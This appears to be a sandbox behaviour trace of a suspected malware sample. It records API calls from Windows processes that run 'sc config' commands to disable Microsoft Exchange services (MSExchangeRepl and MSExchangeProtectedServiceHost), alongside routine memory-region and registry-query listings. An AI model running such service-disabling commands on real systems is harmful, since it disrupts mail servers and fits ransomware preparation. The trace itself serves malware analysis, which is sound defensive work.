[0132.290] _wcsicmp (_String1="config", _String2="start") returned -16 [0132.290] _wcsicmp (_String1="config", _String2="pause") returned -13 [0132.290] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0132.290] _wcsicmp (_String1="config", _String2="control") returned -14 [0132.290] _wcsicmp (_String1="config", _String2="continue") returned -14 [0132.290] _wcsicmp (_String1="config", _String2="stop") returned -16 [0132.290] _wcsicmp (_String1="config", _String2="config") returned 0 [0132.290] ResolveDelayLoadedAPI () returned 0x77262c10 [0132.290] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x548590 [0132.292] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0132.292] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0132.292] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0132.292] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0132.292] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0132.292] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0132.292] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0132.292] OpenServiceW (hSCManager=0x548590, lpServiceName="MSExchangeProtectedServiceHost", dwDesiredAccess=0x3) returned 0x0 [0132.292] GetLastError () returned 0x424 [0132.293] _ultow (in: _Dest=0x424, _Radix=3864852 | out: _Dest=0x424) returned="1060" [0132.293] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0132.294] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x3af8f0, nSize=0x2, Arguments=0x3af908 | out: lpBuffer="褠T擄:蔔è") returned 0x62 [0132.294] GetFileType (hFile=0x3c) returned 0x2 [0132.294] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3af8d4 | out: lpMode=0x3af8d4) returned 1 [0132.294] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x548920*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x3af8e4, lpReserved=0x0 | out: lpBuffer=0x548920*, lpNumberOfCharsWritten=0x3af8e4*=0x62) returned 1 [0132.295] LocalFree (hMem=0x548920) returned 0x0 [0132.295] LocalFree (hMem=0x0) returned 0x0 [0132.295] CloseServiceHandle (hSCObject=0x548590) returned 1 [0132.295] LocalFree (hMem=0x0) returned 0x0 [0132.295] exit (_Code=1060) Thread: id = 515 os_tid = 0xd04 Process: id = "155" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x274b4000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeRepl start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8270 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8271 start_va = 0x460000 end_va = 0x445ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8272 start_va = 0x4460000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 8273 start_va = 0x4480000 end_va = 0x4480fff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 8274 start_va = 0x4490000 end_va = 0x44a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004490000" filename = "" Region: id = 8275 start_va = 0x44b0000 end_va = 0x44effff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 8276 start_va = 0x44f0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8277 start_va = 0x45f0000 end_va = 0x45f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Region: id = 8278 start_va = 0x4600000 end_va = 0x4600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 8279 start_va = 0x4610000 end_va = 0x4611fff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 8280 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8281 start_va = 0x7efe0000 end_va = 0x7f002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8282 start_va = 0x7f00b000 end_va = 0x7f00bfff entry_point = 0x0 region_type = private name = "private_0x000000007f00b000" filename = "" Region: id = 8283 start_va = 0x7f00c000 end_va = 0x7f00efff entry_point = 0x0 region_type = private name = "private_0x000000007f00c000" filename = "" Region: id = 8284 start_va = 0x7f00f000 end_va = 0x7f00ffff entry_point = 0x0 region_type = private name = "private_0x000000007f00f000" filename = "" Region: id = 8285 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8286 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8287 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8288 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8289 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8290 start_va = 0x4640000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 8291 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8292 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8293 start_va = 0x47b0000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 8294 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8335 start_va = 0x4460000 end_va = 0x446ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004460000" filename = "" Region: id = 8336 start_va = 0x4650000 end_va = 0x470dfff entry_point = 0x4650000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8337 start_va = 0x4710000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 8338 start_va = 0x48b0000 end_va = 0x49affff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 8339 start_va = 0x4b80000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 8340 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8341 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8342 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8343 start_va = 0x7eee0000 end_va = 0x7efdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eee0000" filename = "" Region: id = 8344 start_va = 0x7f008000 end_va = 0x7f00afff entry_point = 0x0 region_type = private name = "private_0x000000007f008000" filename = "" Region: id = 8345 start_va = 0x4470000 end_va = 0x4473fff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 8346 start_va = 0x4480000 end_va = 0x4483fff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 8347 start_va = 0x4b90000 end_va = 0x4ec6fff entry_point = 0x4b90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 516 os_tid = 0xe50 [0132.494] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0132.494] __set_app_type (_Type=0x1) [0132.494] __p__fmode () returned 0x77ac4d6c [0132.494] __p__commode () returned 0x77ac5b1c [0132.494] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0132.495] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0132.495] GetCurrentThreadId () returned 0xe50 [0132.495] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe50) returned 0x84 [0132.495] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.495] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0132.495] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.497] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x45ef94c | out: phkResult=0x45ef94c*=0x0) returned 0x2 [0132.497] VirtualQuery (in: lpAddress=0x45ef953, lpBuffer=0x45ef904, dwLength=0x1c | out: lpBuffer=0x45ef904*(BaseAddress=0x45ef000, AllocationBase=0x44f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.497] VirtualQuery (in: lpAddress=0x44f0000, lpBuffer=0x45ef904, dwLength=0x1c | out: lpBuffer=0x45ef904*(BaseAddress=0x44f0000, AllocationBase=0x44f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.497] VirtualQuery (in: lpAddress=0x44f1000, lpBuffer=0x45ef904, dwLength=0x1c | out: lpBuffer=0x45ef904*(BaseAddress=0x44f1000, AllocationBase=0x44f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.497] VirtualQuery (in: lpAddress=0x44f3000, lpBuffer=0x45ef904, dwLength=0x1c | out: lpBuffer=0x45ef904*(BaseAddress=0x44f3000, AllocationBase=0x44f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.498] VirtualQuery (in: lpAddress=0x45f0000, lpBuffer=0x45ef904, dwLength=0x1c | out: lpBuffer=0x45ef904*(BaseAddress=0x45f0000, AllocationBase=0x45f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.498] GetConsoleOutputCP () returned 0x1b5 [0132.498] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.498] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0132.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.498] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0132.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.498] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.498] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.498] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.498] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.499] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.499] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0132.499] GetEnvironmentStringsW () returned 0x47b7d98* [0132.499] FreeEnvironmentStringsA (penv="A") returned 1 [0132.499] GetEnvironmentStringsW () returned 0x47b7d98* [0132.499] FreeEnvironmentStringsA (penv="A") returned 1 [0132.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ee8b0 | out: phkResult=0x45ee8b0*=0x94) returned 0x0 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0xf8, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x1, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0x1, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x0, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x40, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x40, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.499] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0x40, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.499] RegCloseKey (hKey=0x94) returned 0x0 [0132.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ee8b0 | out: phkResult=0x45ee8b0*=0x94) returned 0x0 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0x40, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x1, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0x1, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x0, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x9, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x4, lpData=0x45ee8bc*=0x9, lpcbData=0x45ee8b8*=0x4) returned 0x0 [0132.500] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ee8b4, lpData=0x45ee8bc, lpcbData=0x45ee8b8*=0x1000 | out: lpType=0x45ee8b4*=0x0, lpData=0x45ee8bc*=0x9, lpcbData=0x45ee8b8*=0x1000) returned 0x2 [0132.500] RegCloseKey (hKey=0x94) returned 0x0 [0132.500] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29835 [0132.500] srand (_Seed=0x5ad29835) [0132.500] GetCommandLineW () returned="/c sc config MSExchangeRepl start= disabled" [0132.500] GetCommandLineW () returned="/c sc config MSExchangeRepl start= disabled" [0132.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.500] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47b9cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.500] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.500] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.500] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.500] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.500] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.500] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.500] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.500] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.500] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.500] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.500] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.500] GetEnvironmentStringsW () returned 0x47b7d98* [0132.501] FreeEnvironmentStringsA (penv="A") returned 1 [0132.501] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.501] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.501] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.501] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.501] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.501] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.501] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.501] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.501] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.501] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45ef688 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.501] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x45ef688, lpFilePart=0x45ef680 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x45ef680*="Desktop") returned 0x1d [0132.501] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.501] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x45ef408 | out: lpFindFileData=0x45ef408) returned 0x47b05c8 [0132.501] FindClose (in: hFindFile=0x47b05c8 | out: hFindFile=0x47b05c8) returned 1 [0132.501] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x45ef408 | out: lpFindFileData=0x45ef408) returned 0x47b05c8 [0132.501] FindClose (in: hFindFile=0x47b05c8 | out: hFindFile=0x47b05c8) returned 1 [0132.501] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0132.501] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x45ef408 | out: lpFindFileData=0x45ef408) returned 0x47b05c8 [0132.501] FindClose (in: hFindFile=0x47b05c8 | out: hFindFile=0x47b05c8) returned 1 [0132.501] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.502] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0132.502] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0132.502] GetEnvironmentStringsW () returned 0x47b7d98* [0132.502] FreeEnvironmentStringsA (penv="=") returned 1 [0132.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.502] GetConsoleOutputCP () returned 0x1b5 [0132.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.502] GetUserDefaultLCID () returned 0x409 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x45ef7b8, cchData=128 | out: lpLCData="0") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x45ef7b8, cchData=128 | out: lpLCData="0") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x45ef7b8, cchData=128 | out: lpLCData="1") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0132.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0132.503] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.504] GetConsoleTitleW (in: lpConsoleTitle=0x47baa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.504] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0132.504] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0132.504] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0132.504] _wcsicmp (_String1="sc", _String2=")") returned 74 [0132.504] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0132.504] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0132.504] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0132.504] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0132.504] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0132.504] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0132.505] GetConsoleTitleW (in: lpConsoleTitle=0x45ef4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.506] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.506] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.506] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.506] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.506] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.506] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.506] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.506] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.506] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.506] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.506] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.506] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.506] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.506] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.506] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 